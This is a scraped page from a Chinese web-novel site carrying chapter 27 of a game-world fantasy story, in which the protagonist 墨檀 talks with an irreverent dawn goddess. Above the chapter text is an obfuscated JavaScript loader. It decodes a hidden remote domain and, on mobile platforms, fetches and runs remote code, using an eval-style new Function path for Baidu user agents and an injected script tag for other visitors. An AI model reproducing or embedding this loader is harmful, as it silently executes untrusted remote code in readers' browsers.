98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

第二十七章:与神对话(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

?!

墨檀一度以为自己出现了幻觉,不然好好的曙光女神怎么画风忽然说崩就崩了……

虽然这事儿二十几年来也一直发生在自己身上,但现在的非典型人格分裂应该还没普及到这种程度吧?!

还是说自己这会儿压根就没有登录游戏,之前喝咖啡的时候错把高纯度酒精之类的玩意儿加进去了,现在正处于扑街状态?

不行,思绪已经开始混乱了……

“喂,给个反应啊!”

按理说像曙光女神这种设定,不应该是那种冷漠、刻板、孤高,却还怜天悯人、大爱无疆的矛盾综合体么?

“行不行你倒是给句话啊!我这儿回应一次祈祷挺费劲的!”

但是这位虽然也挺矛盾的,但怎么总觉得哪里怪怪的,女神什么的也喜欢把‘抽丫的’、‘干爆’之类的话挂在嘴边么?这么潮的么?

“我说你在这儿瞎琢磨什么呢?不正经回应的话我听不见啊!”

也有走非主流路线的就是了,比如什么光明神啊、曙光女神啊之类的都不是什么好神,旗下的教派表面上大慈大悲,实则各种男盗女娼,这种设定似乎也挺流行的,但这位好像也不是那种......

“总觉得你在想一些非常失礼的事情呢。”

哎!话说当年隔壁班那个领着一帮熊孩子称霸整个初中部的大姐好像跟这位挺像的嘿,当然后者更敦实些,离成年还早就已经要突破200斤大关了……

“你!有!没!有!在!听!我!说!话!?”

这时面前的‘曙光女神’虚影终于忍不住了,只见她浑身散发着柔和的淡金色光芒,在这无垠的光明世界中一个箭步窜了过来,抡圆了胳膊就是一巴掌糊了过来!

墨檀只感觉一阵暖洋洋的劲风袭来,下意识地就想往旁边一侧,却不料一股沉重而庄严的力量徒然罩住了他,随后便被抽了个结实,嗷的一声便打着转地飞出了好几米……

不过这一巴掌虽然挺疼的,却没让他掉血,反而把这种墨檀处于【绝对中立】性格时特有的‘间歇性思维暴走’给打没了。

“那个……女神大人……”墨檀有些尴尬的从地上爬起来,对面前叉着腰好像正在生气的虚影俯身行了一礼:“我冒犯了。”

见他终于有了反应,曙光女神帕可茜总算不再继续活动关节了,用那依然略显缥缈的声音问道:“是不是感觉我并不像是个女神?”

“小的不敢。”终于确定自己并非处于白日梦中的墨檀这会儿脸上堆满了狗腿般的笑容,连声否认着。

这可是在祈祷过程中真神亲自给予的回应啊,虽然仅仅只是游戏里设定的‘神’,但万一人家一个不高兴直接把他给搞扑街了后果也很严重啊!

更何况这位女神大人似乎脾气的确不怎么好的样子…..

说真的,要不是之前墨檀在胡思乱想的过程中并没有抱有任何恶意或不敬,就算曙光女神自己不介意,在法则层面他也会直接被打上亵神的标签,随后承受一通还不如删号重玩来得划算的代价。

“不敢?”面前的虚影似是轻笑了一声,冲他摊了摊手:“尽管在这个世界中你是我的信徒,我是你的神,但身为高出我一个纬度的生命,就算你真的对我不敬又能如何呢?哪怕那具正在某个教堂中祈祷的身体被毁灭,又能对你造成怎样的影响呢?”

!!!

这句话对于墨檀来说无异于是一道晴天霹雳,也许不只是他,这段话无论被哪个玩家听到想必都会产生极大震撼。

就好像你穿越到某部动画里,结果某个吐槽役走到你面前,宛若恶鬼般狰狞地抱怨道:“那些观众是不是脑袋有问题啊!!!为什么每次投票我这么有底蕴有内涵有深度的角色都仅仅只排在第八位啊!眼镜什么的才不是本体啊喂!滚回去再给我好好看一百遍啊魂淡!!”

类似于这样的感觉……

如果这并非系统的设定,而是这个‘npc’本来就知道些什么的话,那【无罪之界】这个游戏就有些超乎常识了。

这触犯了再怎么人性化的ai都无法踏足的禁忌之线……

不过尽管墨檀整个人都不淡定了,但他依然凭借着强大的心理素质(毕竟有病)飞快地冷静了下来,并试探着问道:“您的意思是?”

“字面上的意思。”曙光女神的虚影摇头道:“你不必紧张,我只是觉得先把话说开了比较有助于我们接下来的交流,但至少希望你在这个世界里一直维持着对我的信仰……呵呵,或者说是信任吧,不然的话‘亵神’这一判定就连我本人也是无法影响的。”

墨檀轻轻点头,同时也稍微放松了一些,虽然这会儿的他很怕麻烦,但如果真的有什么令人糟心的事儿找上门来,他也能够应付的不错(毕竟习惯了)。

“首先我想要告诉你的是~”对方优雅地坐在了一把不知何时出现的华贵座椅上,语调轻松的说道:“我的确是神,众多神邸中的其中一个,倘若必须严格定义的话,你可以认为我‘中立’而‘善良’,但实质上,所谓‘神’并没有世人所理解的那样崇高,我们同样具有情感以及真名,曙光女神是帕可茜。维纳,而并非‘曙光女神既是曙光女神’,懂么?”

墨檀揉了揉自己刚被糊过一巴掌的脸颊,颇为认同道:“原来可能感觉的比较模糊,但我现在对此深有体会。”

“别那么记仇~”曙光女神那被隐于光芒背后的嘴角微微上扬:“只要我不想伤害你,就算我把你踹的满地打滚也不会有任何后果,比如受伤什么的。”

当然,墨檀也并把刚才那一巴掌放在心上,毕竟他可没有身患直男癌之类的心理疾病,比起这种无关紧要的事,他反而更关心一些其它的问题……

“你似乎心有所惑。”女神仿佛能看穿人心般的说道:“有屁快……嗯,但说无妨!”

墨檀扶额,不说别的,反正之前那点儿紧张感现在已经完全没有了。

于是他便提出了那个从刚才开始最让自己感到好奇的问题:“其实我只是想知道,您为什么会找到我,我想哪怕不算这个原本就在这个世界的信徒,信仰您的人中也肯定有不少像‘我这样’的存在,不知道女神大人您是都一视同仁地说过之前那番话,还是仅仅只与我做过这样的交流,如果是的话……我很好奇是为什么?”

也许换一个性格相似的人过来,并不会向女神提出这样一个问题,但此时的墨檀除去性格之外,还有着足够的冷静,所以他十分关注这一点。

毕竟天降大任于斯人也,后边都不是什么好话……

他此时衷心的希望自己并不是一个特例!

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间